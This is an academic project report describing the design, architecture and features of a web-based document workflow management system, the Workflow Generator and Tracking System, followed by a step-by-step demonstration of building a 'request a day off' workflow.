The goal of this project was to develop a customizable web-based document WFMS. Web-based document management technology is concerned with managing the lifecycle of documents, which are represented in our system through the use of web forms. The workflow enactment service is responsible for routing all or part of a form among individuals for approval, processing, or collaboration. Rules govern which parts of a form are required by a particular role. In addition, complex or simple workflow routing decisions are made based on form data.
Our system differs from other open source workflow products in a number of ways. First, it was designed to specifically address document management workflow technology. Web forms provide the means for collecting data from the participant. The workflow enactment service is responsible for displaying all or part of a form as well as routing the form among participants. In contrast, the reviewed open source workflow projects do not address specific workflow system technology.
Second, our system fully implements three of the prescribed WfMC's Workflow Reference Model interfaces through a centralized, web-based application interface. It presents the end user with different functionality depending on one of three user types: administrator, workflow engineer, and standard workflow participant. The standard workflow participant interface addresses Interface 3 of the Workflow Reference Model. It provides the ability to manage workflow tasks. The workflow engineer interface addresses Interface 1 of the Workflow Reference Model. It provides the ability to define a form, a workflow, and a process definition. The administrator interface addresses Interface 5 of the Workflow Reference Model. It provides the ability to monitor workflow progress and to perform such tasks as user and system management.
Finally, our system uses a different approach to defining and evaluating workflow rules. All reviewed open source workflow systems define routing decisions within the process definition itself. The problem with this approach is it limits the reusability of the same definition among other workflows. Our project implements a new process definition approach. It uses three separate
definitions to make up the entire workflow: a form
definition, a workflow definition, and a process
definition. Form and workflow definitions are created
independent of one another. Once created, the process
definition bridges a unique form with a unique workflow.
Rules are defined within the process definition. This
approach encourages the reusability of individual forms and
workflows. In addition, it extends the rule definition
possibilities to include form validation, as well as
routing decisions.
Chapter 2
SYSTEM ARCHITECTURE
2.1 Technologies Used
The system we constructed, the Workflow Generator and Tracking System, is a web-based system developed using the Eclipse IDE [Eclipse]. The Java 2 Enterprise Edition (J2EE) provides the programming back-end for the web browser-based user interface. The J2EE environment is provided through a Jakarta Tomcat 5.5 (version 5.5.9) [Tomcat] application server. Tomcat 5.5 requires Java 2 Standard Edition Runtime Environment (JRE) version 5.0 or later.
Persistent data is stored in a MySQL 5.0 (version 5.0.11-beta) [MySQL] InnoDB database. The data is accessed from the J2EE program via the Connector/J JDBC (version 3.1.10) [MySQL Connector/J] connection interface. Both the iBATIS Data Mapper framework (version 2.0) [iBATIS] and the iBATIS Data Access framework (version 2.0) were used to significantly reduce the amount of Java code needed to access the database. Using eXtensible Mark up Language
(XML) descriptor files, the iBATIS software mapped Java Beans to SQL statements as well as provided a data access abstraction layer.
Apache Software Foundation's Struts framework with Tiles (version 1.1) [Struts] was used to provide the view and controller components of the architecture. The overall system structure is an implementation of the Model-View-Controller (MVC) software architecture. With this architecture, the interface (view) is loosely coupled to the business logic (controller) and the business logic is loosely coupled to the data (model). The Struts framework provides a controller component for web-based applications that use a J2EE compliant application server. Tiles are view components that allow the interface to be assembled "in pieces." The framework uses an XML configuration file to organize, lay out, and reuse the individual components or tiles. Tiles for headers, footers, and navigation bars were placed in the same location on all pages to provide a consistent display format.
The user interface is implemented using Java Server Pages (JSP) (version 2.0), part of the J2EE platform, and Cascading Style Sheets (CSS). The Struts framework
provides several JSP tag libraries to simplify access to controller and data objects from within JSP. In addition, the project also utilizes the Java Standard Tag Library (JSTL) [JSTL], as well as the Struts Layout Tag Library [StrutsLayout]. Javascript is used sparingly throughout the project. CSS was implemented to give end users the ability to customize the look and feel of their system without having to modify the JSP. The project’s main logo as well as the CSS table-less design were adopted for use from the tutorials presented on the MaxDesign website [MaxDesign].
2.2 Architecture
At the highest level, the tracking system implements the MVC design pattern. The view layer is the user interface. The view never directly interacts with the model, which is the database. Data that is changed or events that occur in the view component are sent to the appropriate controller component. The controller determines what action should be taken for the event. The controller, through defined action form classes, passes control to the business layer. The business layer calls methods on the Data Access Object (DAO) interface in order to pass and receive data from the
model component. The implementation of this architecture can be seen in Figure 2.
As a brief description of the Struts framework, the framework relies on one or more XML configuration files that associate three main components: Action classes, Form classes, and JSP or Tile names. When a JSP document is requested from the server, it is requested via an action
call. The action call is defined in the configuration file along with a fully qualified action class name and a fully qualified action form class name. The controller executes the appropriate action method then instantiates the associated action form object. In addition, it is the controller's responsibility to determine the appropriate page to display before passing the request to the server.
The server is responsible for compiling the embedded Javascript and JSP tags that determine which elements are displayed. The document is then rendered as an HTML page containing data fields on a form and presented to the user. When the form is submitted, another action is called. The controller populates the instantiated action form object with the appropriate form values using JavaBean property methods. The action form can then interact with the business layer as designed.
The business layer design for this project was modeled after the iBATIS JPetStore 4.0.5 [iBATIS] example. The domain classes are the entities of the workflow application. Each domain class represents a JavaBean. Each domain class contains only variables that define its properties as well as "getter" and "setter" methods. The
domain objects are utilized by both the model and business layer components.
Each presentation class extends the Struts ActionForm class. The controller uses the presentation class to retrieve, populate, and present data in the view component of the architecture. Initially, the action class calls a method in the presentation class to handle the business logic. The presentation class, in turn, interacts with the service class each time access to the model layer is requested. Finally, the service class utilizes the DAO interfaces to extract information from the database.
Access to the database has been implemented using the Data Access Object pattern [Gamma95] with iBATIS’ Data Access Objects API and SQL Data Mapper framework. The DAO API provides for the dynamic configuration of various persistence mechanisms. Since the service classes interact only with the DAO interface, the actual implementation details are hidden from the rest of the application. This project uses the iBATIS SQL maps as its persistence mechanism. The SQL map DAO class methods interact directly with the SQL Data Mapper framework.
The SQL Data Mapper framework uses one or more XML configuration files to map domain objects to SQL tables or query results. For this project, multiple configuration files were used to represent either a single table in the database or a collection of related tables. Each configuration file contains an XML mapping of table column names to domain object property names, as well as the defined SQL queries for the appropriate tables. A separate XML file holds the database connection properties that also support the configuration of various Database Management Systems (DBMS).
Whenever the service class calls a method on the DAO interface, the implemented SQL Map DAO passes the name of the query and any parameters to the framework. The Data Mapper framework does the rest. It performs the necessary database connection operations (open, close, as well as pooling), executes the query, and returns a populated domain object as a result.
The Workflow Generator and Tracking System was built to align with the Workflow Reference Model, as Figure 3 shows. It fully implements three of the five recommended interfaces. Interface 5 provides the administration and management tools of the application. In order to demonstrate interactions with organizational or resource data, this application provides user management and system management capabilities to those with Administrator level access. Interface 1 provides the workflow definition tools of the application. Workflow Engineers have the ability to create form definitions, workflow definitions, and process definitions. In addition, they are responsible for creating roles for use in the creation of a workflow. Interface 2 provides task management functionality for users of the workflow system. The Workflow Generator and Tracking System produces each workflow so it may be accessed as its own, unique web-based system. Within the customized system, users in the appropriate roles have the
ability to create a new instance of a workflow, view an instance of a workflow, modify an instance of a workflow, and transition an instance of a workflow.
The workflow enactment service is made up of six engines that handle the various requests of the system. The Resource Engine handles all user related tasks. This includes such things as logging in and out of the system, as well as creating and modifying user accounts. The Form Engine handles all tasks related to the creation of a form.
The Workflow Engine handles all tasks related to the creation of a workflow. The Process Engine handles all tasks related to the creation of a process definition. The System Engine handles all tasks related to the creation of a new system. The Custom App Engine handles all tasks associated with individual workflow task management, such as viewing, transitioning, and assigning a workflow task.
The database contains forty tables that are used to store information regarding users, forms, workflows, process, rules, systems, and workflow instances. The design supports the creation of multiple workflows independent of application domain and without the need for additional tables, by extracting the common elements shared among instances and storing all form values as text in a single table. Appendix A represents a logical diagram of the database.
3.1 Security and Encryption
The Workflow Generator and Tracking System provides three access levels: administrator, workflow engineer, and standard user. Those with standard user privileges, upon log in, are restricted to accessing published systems and
their associated workflows only. Users with workflow
engineer privileges are granted access to the form
management, workflow management, and definition management
tools. Users with administrative access have all
privileges plus access to system management and user
management tools. A single, super user was also created
for the system.
All users have the ability to edit their personal account
information including changing their password. Each
individual is responsible for selecting their security
question and answer at their initial log in. This
information is maintained for use in the event a person
forgets her password. The security information is private
and is not accessible to the administrator at anytime. All
system passwords and security answers are encrypted in the
database using the MD5 encryption algorithm.
3.2 User Management
The User Management option is available only to
Administrators. In this component, Administrators have the
ability to create, edit, activate, and de-activate users of
the Workflow Generator and Tracking System. The
information stored for each user includes first name, last
name, phone number, email, username, password, password
confirmation, access level, and active status.
Within this component, Administrators also have the ability
to create new and edit existing user groups.
Administrators can add individual users or existing groups
as members of another group. They also have the ability to
remove members from a group. The application provides two
system-defined groups: the All User group and the System
Level - Admin group. As a user is created, she is added to
the All User group. The All User group provides a
convenient way to access all users of the system. An
Administrator can also grant administrative access at the
individual system level by placing a user or group in the
System Level - Admin group.
3.3 System Management
The System Management component gives the Administrator the
ability to create, edit, activate, and de-activate custom
systems that operate “outside of” the Workflow Generator
and Tracking System. When defining a new system, the
Administrator creates a website name and chooses a style sheet for a custom "look and feel." Once created, the new system appears as a selection under the Select System menu option. The Administrator can then associate one or more published process definitions with the newly created system. Any user, including those with Standard User permissions, can link to and begin using the newly created web-based system for task management.
3.4 Definition Modes and Versions
The Workflow Generator and Tracking System houses three definitions that together comprise a workflow: a form definition, a workflow definition, and a process definition. Each definition has been designed to support three modes: design mode, test mode, and published mode. In design mode, anything is possible. The Workflow Engineer can add, modify, or delete any part of a definition. In test mode, the definition cannot be modified except to be placed back into design mode. In published mode, some modifications are permitted, depending on the type of definition; however, a published definition can never return to any of its previous states. It will remain permanently in published mode.
When a Workflow Engineer initiates the creation of a definition, it begins in design mode. Definitions in design mode are not visible to any other component. When a form or workflow definition is ready for testing, the engineer places the definition into test mode. In test mode, it becomes visible to the process definition component. The Workflow Engineer can now assemble the process definition comprised of a single form and a single workflow.
When the process definition is ready for testing, the engineer would normally place it in test mode. Due to time constraints, however, the test feature was not implemented. At this point, the engineer must by pass the test phase and publish the definition. When the engineer places the process definition into published mode, the associated form and workflow are published as well.
The system was also designed to support versioning of each type of definition. The idea was to allow new versions of a published definition to be created and published along side of an already existing version. This can be demonstrated, however, the GUI tools for creating
additional versions were unable to be built, again due to
time constraints.
3.5 Form Management
The Form Management component provides a Workflow Engineer
with the tools to create forms. An Engineer can create,
edit, and delete any form in design mode. Published forms
may be modified; however, editing capabilities are limited.
Forms are built incrementally using the designer interface.
Forms support multiple pages, sections, and controls.
There are eleven choices for form controls: Checkbox,
Currency, Date, Double, Dropdown, Email, Float, Integer,
Radio, Text, and Text area. The controls generate HTML
form objects and provide built-in validation. For example,
by selecting the Email control, the form engine will
generate a text box for data collection and insure that any
data entered passes email validation. If Integer control
were selected, the form engine would generate a similar
text box for data collection. However, it would insure the
information collected passes integer validation instead.
Workflow Engineers also have the ability to customize their
own lists for Dropdown, Radio, and Checkbox controls. In
addition, they have the ability to add labels, tool tips, default values, as well as size and order their controls on the form.
3.6 Workflow Management
The Workflow Management component provides a Workflow Engineer with the tools to create workflows. An Engineer can create, edit, and delete any workflow in design mode. Published workflows may be modified; however, editing capabilities are limited. Workflows are built incrementally using the designer interface. Workflows are comprised of three main parts: states, transitions, and workflow pattern strategies [van der Aalst].
3.6.1 States
A state represents a transitioning point in a workflow. Each state is dependent upon a participant responsible for signaling the end of a task. This system supports multiple states, one of which must be indicated as the initial state.
Each state is associated with a given role. Roles are comprised of one or more individuals or groups in an organization. At each state, the Workflow Engineer determines whether or not a given role should have the permission to cancel a workflow instance, close a workflow instance, or reassign a workflow instance to another participant within the same role. In addition to providing the tools to manage states, this system provides the Workflow Engineer with the ability to create and manage roles.
3.6.2 Transitions
A transition occurs when a participant has signaled the completion of a task. The workflow moves from one state to the next state according to the defined path. The Workflow Engineer defines a transition by indicating a "from state" and a "to state." There can be multiple transitions originating from a single state, as well as multiple transitions converging on a given state. The next two sections discuss assignment and transition strategies.
3.6.2.1 Assignment Strategies
This system implements three assignment strategies: Pull, Push, and Auto-Lookup. The Pull strategy [Muehlen04] routes tasks to a general queue without requiring the name of a specific individual. The general queue holds all unassigned tasks until a role member is able to assign the task to herself. The tasks are available only to individuals who are part of the associated role. Once checked out, the workflow instance for that state becomes the responsibility of the individual user. Once assigned, the task is no longer available to other role members.
The Push strategy [Muehlen04] requires that the transitioning role member manually assign the instance to a role member in the next state. Upon transition, the system presents the current participant a list of individuals to choose from. Once selected, the system transitions the instance to the next state and the task appears in the queue of the selected participant.
The Auto-Lookup strategy is not based on any research. It was included to demonstrate a third assignment strategy. The Auto-Lookup strategy automatically assigns the instance
to the next role member, if the list of participants is made up of only a single member or if the state has been visited previously by the current instance.
3.6.2.2 Transition Strategies
In addition to the assignment strategies, there exist six recognized transition strategies: Deferred Choice, And Split, Or Split, Sequence, Merge-First Wins, and Merge-Last Wins. All of the implemented strategies are based on published workflow pattern research [van der Aalst].
The Sequence strategy is implemented by the system any time there is a single transition originating from a given state. Since there is only one decision path for the given state, the system automatically transitions to the next state.
The And Split and Or Split strategies are necessary when there are multiple transitions originating from a given state. If multiple transitions exist, the system presents the Workflow Engineer with a choice of using the Or Split strategy or the And Split strategy. If the And Split strategy is selected, no further rules are required. At
the time of transition, the workflow instance will automatically transition to all states included as part of the And Split strategy. If the Or Split strategy is selected, the Workflow Engineer must define at least one transition rule for each transition included as the Or Split strategy. Rule definition occurs at the next stage, during the creation of the process definition.
The Merge-First Wins and the Merge-Last Wins strategies are necessary when there are multiple transitions converging on a given state. If multiple transitions exist, the system presents the user with a choice of using the Sequence strategy, the Merge-First Wins strategy, or the Merge-Last Wins strategy. The engineer can decide which, if any, transitions should participate in a merge. The Merge-Last Wins strategy prevents the workflow instance from transitioning to the next node until all states participating in the merge have indicated completion of their task. At the time the final merge participant signals completion, the instance transitions to the next state. The opposite is true of the Merge-First Wins strategy. Once the very first merge participant indicates completion of their task, the instance transition to the next state. The remaining participants are still required
to complete their task; however, the instance closes silently without transitioning to the next state.
The Deferred Choice strategy is the only strategy that presents a list of transition choices to the user, prior to her decision to transition to the next state. All other transition strategies are calculated by the system after the user signals the completion of the task. In other words, for these strategies, transition choices are not visible to the user. To implement a deferred choice strategy, the Workflow Engineer must select yes to the deferred choice option on the transition tab.
3.7 Definition Management
The Definition Management component provides a Workflow Engineer with the tools to create a process definition. An Engineer can create, edit, and delete any process definition in design mode. Published process definitions may be modified; however, editing capabilities are limited. Process definitions are comprised of a single form and a single workflow. Once the form and the workflow have been selected, the Workflow Engineer can create the rules that govern each. The Definition Management component gives the
engineer the ability to create, edit, or delete form as well as transition rules. All rules are based on information contained in the form.
3.7.1 Transition Rules
Transition rules are required only when an Or Split transition strategy has been indicated for the given workflow. The creator must define at least one rule for each transition involved in the Or Split group. If the rule evaluates to true upon transition, the transition path will be selected. The rules may be defined to be exclusive or multiple paths may evaluate to true. The implementation is in the hands of the Workflow Engineer.
3.7.2 Form Rules
Form rules are optional. As described within the form management section, the system provides for basic validation according to control type. For example, a date control will check for valid date entries. However, if a Workflow Engineer would like to make a particular form field required, she must define an additional form rule. In addition, the Workflow Engineer has the option of
selecting whether a form rule should be evaluated on every transition or only on a given transition.
3.7.3 Rule Definition
The methods for defining form rules and transition rules are exactly the same. This system's rule implementation approach is modeled after the ASP.NET Validation Server Controls [MSDN]. The Workflow Engineer can choose to implement the Required Validator, the Compare Validator, or the Range Validator.
3.7.3.1 The Required Validator
The Required Validator is the simplest of all validation types. It checks to make sure the form field has been populated. If validation fails, a custom error message, as defined by the engineer, will be displayed to the user.
3.7.3.2 The Compare Validator
The Compare Validator is used when a given form control needs to be compared to another form control or value,
based on the following operator types: Equal, Not Equal, Greater Than, Greater Than Equal, Less Than, and Less Than Equal. If the given form control is to be compared to another form control, the system presents the Workflow Engineer with a list of controls matching the given control type. On the other hand, if the given form is to be compared to a value, the Workflow Engineer must enter a value appropriate for the given control type.
3.7.3.3 The Range Validator
The Range Validator is used when the given form control must be validated according to a lower bound and an upper bound of values. The Workflow Engineer must select both a minimum and maximum value appropriate for the given control type. For both the Compare Validator and the Range Validator, if validation fails, a custom error message is presented to the user.
3.8 Task Management
The Workflow Generator and Tracking System uses the information collected by the Workflow Engineer and the Administrator to produce the Task Management interface as a
separate, functioning web system. The component itself may house one or more process definitions. For each definition, users with Standard User permission have the ability to select a workflow, create a new instance of a workflow, modify an existing instance of a workflow, view the history and comments associated with a workflow, as well as the ability to assign and transition a workflow. Tasks are initialized using the Add New Instance option. Instances of each document are created and managed according to the form, workflow, and process definitions. Tasks remain open until a user successfully closes or cancels the instance.
Chapter 4
CONCLUSIONS
4.1 Summary
In summary, after having researched various approaches to building this class of systems, it can be said that while the scope of a workflow varies among products, all seem to share in common the ability to define a process and a set of classes that can interpret the generated definitions. Some provide only the workflow engine API. Others offer more of a framework, along the lines of the WfMC Reference Model. In either situation, the end user is dependent upon the system developer to produce a functioning WFMS. Our observation was that current open source workflow products seemed to exist as tools for the system developer interested in workflow, rather than as a solution for the end user in need of a WFMS.
The goal of this project was to use an EUD approach to produce a complete, out-of-the-box WFMS solution for web-based document management. Its main purpose was to give the business-oriented end user the ability to automate
workflow without the need to program. The Workflow Generator and Tracking System accomplishes this goal. It addresses specifically three types of users: administrators, workflow engineers, and standard workflow participants, by providing the appropriate tools for monitoring, developing, and coordinating automated workflow tasks. In addition, it incorporates information (the form), as well as organization (the participants) within the overall process (workflow) design to produce a complete WFMS [Hollingsworth04].
4.2 Future Enhancement Recommendations
The author acknowledges the scope of this project was greater than initially anticipated. The overall size of the effort did not allow for the implementation of every feature originally envisioned or specified in the proposal. In particular, desirable features that were not implemented include a scheduler of tasks, a method to recall transitioned tasks, the end user tools to create definition versions, the ability to operate in test mode, and the full implementation of notification strategies such as email.
Although the list above appears lengthy, the items on it were close to being within reach. For example, the current system design allows for versioning support of all definition types. However, the GUI tools that would have allowed the end user to create them have not been developed.
Recommendations for future enhancements include incorporating more transition and assignment options, enhancing rule functionality, incorporating recall options, implementing messaging services, implementing visibility and edit constraints on form fields according to role, and implementing a task scheduler.
REFERENCES
[Baeyens04]
http://www.theserverside.com/articles/article.tss?l=Workflow
[Eclipse]
http://www.eclipse.org/
[EnhydraShark]
http://shark.objectweb.org/
[Gamma95]
[Hollingsworth04]
Hollingsworth, D., "Workflow Reference Model:10 Years On,"
[iBATIS]
http://ibatis.apache.org/
[jBPM]
http://www.jboss.com/products/jbpm
[JFolder]
http://www.powerfolder.org/
[JSTL]
http://jakarta.apache.org/
[MaxDesign]
[MSDN]
http://msdn.microsoft.com/
-37-
(REFERENCES, Cont’d)
[Muehlen04]
[MySQL]
http://www.mysql.com/
[MySQL Connector/J]
[OpenWFE]
http://web.openwfe.org/
[Perez]
[Repenning04]
[Struts]
http://struts.apache.org/
[StrutsLayout]
http://struts.application-servers.com/
[Tomcat]
http://tomcat.apache.org/
[Topicus]
http://www.topicus.nl/topwfm/
[van der Aalst]
http://is.tm.tue.nl/research/patterns/patterns.htm
[WfMC]
http://www.wfmc.org
(REFERENCES, Cont'd)
[WFMC-TC-1003]
[wfmOpen]
http://wfmopen.sourceforge.net/
[XFlow]
http://xflow.sourceforge.net/
[YAWL]
Figure A1: Database Logical Model
APPENDIX B
SYSTEM DEMONSTRATION
REQUEST A DAY OFF WORKFLOW EXAMPLE
Log In
When a user accesses the website, the system presents the user with a log in screen shown in Figure B1. At initial log in, the user must enter the username and password assigned to her by the system administrator.
Figure B1: The Log In Screen
Register Account
When a user accesses the system for the first time, she is presented with the screen shown in Figure B2 that displays her information. The system requires the user to update any incorrect information, modify and confirm her password, and select a security question and answer. The security question and answer are stored in the event the user forgets her password. When the user has completed her changes, she selects the register account option to return to the log in screen.
Figure B2: Register Account Screen
Access Levels
The Figures B3, B4, and B5 show each of the navigational views according to user access level.
Figure B3: The Standard User View
Figure B4: The Workflow Engineer View
Figure B5: The Administrator View
User Management
The User Management menu gives the Administrator two options: Manage Users and Manage Groups.
Manage Users
The User tab shown in Figure B6 is the tool used to add or edit users. When adding a new user, the administrator populates all of the fields and chooses one of the three provided access levels. She also has the ability to edit any existing user by selecting her from the drop down list of active users. The Administrator can de-activate any existing user by un-selecting the Active checkbox.
Figure B6: The Manage User - User Tab
The User Groups tab is shown in Figure B7. This screen displays the current user groups for the selected user, as well as allows the Administrator the ability to add and remove groups as needed. Each new user added to the system is automatically placed in the All Users group.
Figure B7: The Manage User - User Groups Tab
Manage Groups
The Group tab is shown in Figure B8. Administrator adds and modifies groups within this interface. Administrators enter a group name and optional description to add a new group. To edit the group, the Administrator would select the group from the list provided, make changes, then update.
Figure B8: The Manage Groups - Group Tab
(User Management, Cont’d)
The Account Members tab, Figure B9, and the Group Members tab, Figure B10, allow the Administrator to add individual and group members by selecting a member, then selecting the add button. They may also remove members from the group by selecting the current member of choice, checking the Remove Member checkbox, then selecting the update button.
Figure B9: The Manage Groups - Account Members Tab
Figure B10: The Manage Groups - Group Members Tab
System Management
The System Management menu gives the Administrator one option: Manage Systems.
Manage Systems
The System tab shown in Figure B11 is the tool used to add or edit systems. Each system created will appear in the Select A System menu on the navigational bar for all users. The Task Management component is enacted within the custom generated system. To add a new system the Administrator, enters a label, an optional description, a title for the web system, enters the name of a style sheet, then selects the add system button. This information may also be edited for existing systems. As well, Administrators can activate and de-activate existing systems.
Figure B11: The Manage Systems - System Tab
-48-
The System Processes tab is shown in Figure B12. This screen allows the Administrator to associate any published process definitions with the given system. The Administrator chooses the system from the list of published definitions then selects the add process button. Administrators may also remove process definitions from existing systems by selecting the remove option then the update button.
Figure B12: The Manage Systems - System Processes Tab
Form Management
In order to demonstrate the form management tools, we will build a simple form for requesting a day off. It will be one page containing two sections, one for the Employee and one for the Manager. The Employee section will have three controls: a dropdown list control, containing the type of request; a date control, indicating the start date of the request; and a second date control, indicating the end date of the request. The Manager section will have a text area control for comments that will be required in the event the Manager rejects the request.
The Form Management menu gives the Workflow Engineer three options: Design Form, Modify Published Form, and Manage Form Lists.
Manage Form Lists
The Category tab is shown in Figure B13. Workflow Engineers can create their own lists for use within Dropdown, Radio, or Checkbox controls. For this example, we need to create a list that contains each of the day off request types. We must enter the required information and select the add button.

The Item tab is shown in Figure B14. Within this tab, we add each of our custom day off request types. We will enter two types: Personal Day and Vacation Day.
Design Form
The Form tab is shown in Figure B15. The Workflow Engineer enters a form label and an optional description before adding the form. The mode defaults to design mode so full editing capabilities are available to her.
The Pages tab is shown in Figure B16. The Workflow Engineer must select the form she would like to modify from the list of available forms. The form we are building will contain a single page, so we will add a page called "pageone." We enter "pageone" as the label and select the add button. We do not need to worry about the order since there is only one page.
Figure B16: The Design Form - Pages Tab
The Sections tab is shown in Figure B17. The form we are building will contain two sections, so we will add two sections, one called “Employee Information” and the other called “Manager Information.” We enter the label for the section and select the add button. We repeat this for each section. In this example, we would like the Manager section to appear after the Employee section. After adding the Manager section, we will change the order number to 2 and select the update button.
Figure B17: The Design Form - Sections Tab
The Controls tab is shown in Figure B18. The form we are building will contain three controls for the Employee section and a single control for the Manager section. For the Employee section we will add one dropdown control and two date controls. For the Manager section, we will add one text area control.
First, we select a control type. We will select DROPDOWN from the list of choices. Notice that the Select List option becomes available. Because this is a Dropdown control, we must select the list we want to associate with this control. We will choose the Day Off Request Types list we created earlier. Next, we enter a label for our control as well as an optional tool tip. Once we confirm the appropriate section is selected, we add the control. We repeat this process for the remaining controls we want to appear on the form.

The results of selecting the View Form tab can be seen in Figure B19. The form we are building can be viewed at any time during the build process. Our form is almost complete. The controls appear in the correct order. However, the comment area looks too narrow. We can go back to the control tab, select the Reason For Denial control, and update the size of the control. The new results are shown in Figure B20.
Workflow Management
In order to demonstrate the workflow management tools, we will build a simple workflow for requesting a day off. This workflow will contain four states. The initial state will be displayed as "Pending Employee Request," the next state will be "Pending Manager Review," the next two states will be based on the Manager's decision. If the Manager approves the request, the instance will enter a Closed state. If the Manager denies the request, the instance will enter the "Request Denied" state, for the employee to review.
The Workflow Management menu gives the Workflow Engineer three options: Design Workflow, Modify Published Workflow, and Manage Roles.
Manage Roles
The Role tab is shown in Figure B21. Workflow Engineers can create custom roles to contain the appropriate members of the organization. For this example, we need to create two roles: Employee and Manager. To create a role, enter the role name and an optional description, then select the add button.
Figure B21: The Manage Roles - Role Tab
The Account Members tab is shown in Figure B22. Within this tab, we will add Stacy Hutchings as the only member of the Manager role. We must have the Manager role selected before we begin. Since the current role member list is empty, we must select Stacy Hutchings from the list of members, then select the add button. We will repeat this process for the Employee role. However, we will add the All User group to this role as shown in Figure B23.
Figure B22: The Manage Roles - Account Members Tab
Figure B23: The Manage Roles - Group Members Tab
Design Workflow
The Workflow tab is shown in Figure B24. The Workflow Engineer enters a workflow label and an optional description before adding the workflow. The mode defaults to design mode so full editing capabilities are available to her.
Figure B24: The Design Workflow - Workflow Tab
The States tab is shown in Figure B25. The Workflow Engineer must select the workflow she would like to modify from the list of available workflows. The workflow we are building will contain four states. Since one of them will be transitioning to the Close state, which is already provided by the system, we only need to create three states.
The first state we enter will be our initial state, although the order we enter them does not matter. For this entry, we must change the initial state indicator to YES, on subsequent requests we will leave it as NO. We will assign the Employee role as the participant of this state. We will also give the participant permission to cancel this instance. However, we do not want them to be able to close the request or be able to reassign this request to another Employee.
Figure B26 and Figure B27 show the remaining states and their settings. The participant at the Request Denied state will be given permission to close the instance.
Figure B26: States Tab: Pending Manager Review
Figure B27: States Tab: Request Denied
The Transitions tab is shown in Figure B28. The workflow we are building will contain three possible transitions: transition one, from Pending Employee Request to Pending Manager Review; transition two, from Pending Manager Review to Close; and transition three, from Pending Manager Review to Request Denied.
For transition one, we select the "from state," the "to state," give the transition a name, then select an assignment strategy. Since the manager role contains only one member, we use the Push-Auto Look Up strategy to let the system automatically assign the instance for us.
Figure B28: Transitions Tab: Transition One
Figure B29 shows the selections made for transition two. The assignment strategy does not matter when transitioning to the Close state. For the transition strategy, we will use Deferred Choice to present the transition decision to the Manager. We change the Deferred Choice indicator to YES, customize our label, and add an optional description before selecting the add button.
Figure B29: Transitions Tab: Transition Two
Figure B30 shows the selections made for transition three. The assignment strategy will be Push - Manual, since there are multiple users in the Employee role. For the transition strategy, we will again use Deferred Choice to present the transition decision to the Manager.
The From Strategies tab and the To Strategies tab provide a summary of the current transitions from two different perspectives. Figure B31 shows all transitions originating from a given state within the current workflow. Figure B32 shows all transitions converging on a given state within the current workflow.
Figure B31: The Design Workflow – From Strategies Tab
Figure B32: The Design Workflow – To Strategies Tab
Before we can define the process definition, both the workflow and the form must be placed in test mode as shown in Figure B33 and B34.
Figure B33: The Design Form - Form Tab
Figure B34: The Design Workflow - Workflow Tab
Definition Management
In order to demonstrate the definition management tools, we will add several form rules. We will also customize which fields should appear in the pending task queue within the task management component.
The Definition Management menu gives the Workflow Engineer two options: Design Definition and Modify Published Definition.
The Definition tab is shown in Figure B35. The Workflow Engineer enters a definition label and an optional description before adding the form. In addition, she must select a form and a workflow. The mode defaults to design mode so full editing capabilities are available to her.

The Queue Fields tab is shown in Figure B36. The Workflow Engineer must select the definition she would like to modify from the list of available process definitions. Each dropdown list contains the form controls available for display in the task management component. We will select Request Type, Start Date, and End Date.
Figure B36: The Design Definition – Queue Fields Tab
The Rule tab gives the Workflow Engineer the ability to build transition as well as form rules. For this workflow, there are no required transition rules as shown in Figure B37. However, we would like to define several form rules. First, we would like to make the Request Type, Start Date, and End Date required for transition one. Second, we would like to add a rule to validate the Start Date is before the End Date. Third, we would like to make the Comments required for transition three.
Figure B37: The Design Definition - Rules Tab
Figure B38 and Figure B39 show examples of the rule definitions for transition one. The type is Form Rule, the transition is transition one, the control to validate is indicated, and we are using the required validator.
Figure B38: Rules Tab: T1 - Request Type Required
Figure B39: Rules Tab: T1 - Start Date Required
Figure B40 shows the rule definitions for transition three. The type is Form Rule, the transition is transition three, the control to validate is indicated, and we are using the required validator. The View Rules tab, shown in Figure B41, provides a summary of all rules defined for the current process.
Figure B40: Rules Tab: T3 - Reason For Denial Required
Figure B41: The Design Definition - View Rules Tab
We have completed our process definition. We are ready to publish the definition. Publishing the definition automatically publishes the form as well as the workflow and makes the process definition available for system assignment. Figure B42 shows the process definition in published mode.
System Management
Now that we have a published process definition, we are ready to add the process to an existing system. Figure B43 shows the Manage Systems - System Processes tab. We will add the RequestADayOff process definition to the UNF System. Figure B44 shows the choices beneath the Select A System menu.
Figure B43: The Manage Systems - System Processes Tab
Figure B44: The Home Page - Select A System Menu
Task Management
To access the task management component, a user must select a system. Figure B45 shows the resulting workflow system when the user selects the UNF system.
Figure B45: The UNF System - Home Page
(Task Management, Cont’d)
The Task Management component gives the Standard User three options: Select A Workflow, View a Workflow Queue, and Add A New Instance.
The user must select a workflow in order to access the other menu options. When the user chooses the RequestADayOff workflow, the system presents the current user with a list of pending tasks. In Figure B46, there are no pending tasks for Stacy Hutchings.
Figure B46: The UNF System - View Workflow Queue
The View Workflow Queue option automatically defaults to the pending tasks of the current user. The user has the ability to view All Open, Canceled, and Closed tasks, see Figure B47. Any additional workflow states that contain tasks will also appear in the list to choose from.
Figure B47: The UNF System – View Workflow Queue
When the user is ready to add a new workflow instance, she selects the Add New Instance option. The system presents the user with the Day Off Request Form shown in Figure B48. This is the custom form built by the Workflow Engineer for the RequestADayOff process.

Figure B48: The UNF System - Add New Instance
Request A Day Off Example in Action
To demonstrate the entire workflow process from within the Task Management component, Jimi Hutchings and Caitlyn Hutchings will play the part of the Employee. Stacy Hutchings will play the part of the Manager. Jimi and Caitlyn will each submit a request for time off. Stacy will approve the first request and deny the second request, to demonstrate the possible workflow transition paths.
To submit a request for time off, Jimi Hutchings selects the Add New Instance option. He is presented with the screen in Figure B48. He enters the type of request, the start date of his time off, and the end date of his time off. Once complete, he selects the add button. The request appears in his list of pending tasks, see Figure B49.
The queue displays the request ID, the date submitted, the name of the person who created the request, the version of the workflow definition, the three form fields selected by the workflow designer, the current status, and the person who the task is currently assigned to.
Figure B49: The UNF System - J Hutchings’ Pending Queue
(Request A Day Off Example in Action, Cont’d)
To view the task, Jimi selects the ID of the request. The system presents him with the view shown in Figure B50. Within the summary tab, the details of the form are displayed along with the option to update.

Within the comments tab, the history of the instance is displayed. The system records all transition as well as assignment events. This screen also gives all users the ability to add comments. Figure B51 shows the Comments tab.
Figure B51: View Instance Details - Comments Tab
(Request A Day Off Example in Action, Cont’d)
The Transition tab and the Reassign tab display transition and reassignment choices to the user respectively. Both options are determined by the workflow definition. Figure B52 and Figure B53 show each tab. Jimi has two transition options and zero reassignment options.
